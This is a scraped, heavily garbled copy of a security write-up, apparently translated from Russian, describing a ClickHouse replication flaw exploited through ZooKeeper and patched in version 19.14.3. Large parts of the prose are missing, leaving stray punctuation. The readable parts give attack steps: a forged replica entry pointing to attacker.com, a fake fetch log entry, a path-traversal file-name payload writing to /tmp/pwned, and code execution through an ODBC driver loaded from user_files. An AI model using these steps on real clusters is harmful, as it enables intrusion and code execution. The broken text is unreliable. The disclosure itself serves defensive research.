👩🏼‍🍳 🌚 🖊️ Por que manter as jaulas do zoológico fechadas 👽 🤛🏿 🙇🏻

Este artigo será uma história sobre uma vulnerabilidade muito comum no protocolo de replicação ClickHouse e também mostrará como você pode expandir o plano de ataque.

ClickHouse — , . ClickHouse Apache ZooKeeper (ZK) .

ZK , ZK , Kafka, Hadoop, ClickHouse .

ZooKeeper

0day Java , , ZooKeeper, ClickHouse.

ClickHouse DDL, ZK — /clickhouse/task_queue/ddl.

/clickhouse/task_queue/ddl/query-0001 :

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

host1 host2 test . DDL CREATE/ALTER/DROP.

? ?

ClickHouse , ZK , . (ZK , chXX — , foobar — ):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

columns metadata.

/clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

? , (TCP/9009) chXX-address firewall . ?

ZK, /clickhouse/tables/01-01/foobar/replicas/chXX host.

/clickhouse/tables/01–01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

, , — ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX , , ):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

source_replica — , , block_id — , get — "get block" ( ).

, , ( , HTTP). attacker.com :

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

XXX — . ClickHouse HTTP. , , ZooKeeper, , .

, , .

, , , , . , .

/var/lib/clickhouse ( - ):

flags — , ;

tmp — ;

user_files — (INTO OUTFILE );

metadata — sql ;

preprocessed_configs — /etc/clickhouse-server;

data — , ( /var/lib/clickhouse/data/default).

. — . foobar, , :

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

- .

file_name WriteBufferFromFile. , clickhouse. , , ( ):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

../../../../../../../../../tmp/pwned /tmp/pwned hellofromzookeeper.

(RCE).

RCE

ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs. . /etc/clickhouse-server , . ClickHouse -, — . ClickHouse, , root.

ODBC RCE

clickhouse, /nonexistent. , , /nonexistent clickhouse (! . ).

ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge, . , , ?

~/.odbc.ini :

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so RCE ( buglloc ).

ClickHouse 19.14.3. ClickHouse ZooKeepers!

Por que manter as jaulas do zoológico fechadas

RCE

ODBC RCE

More articles: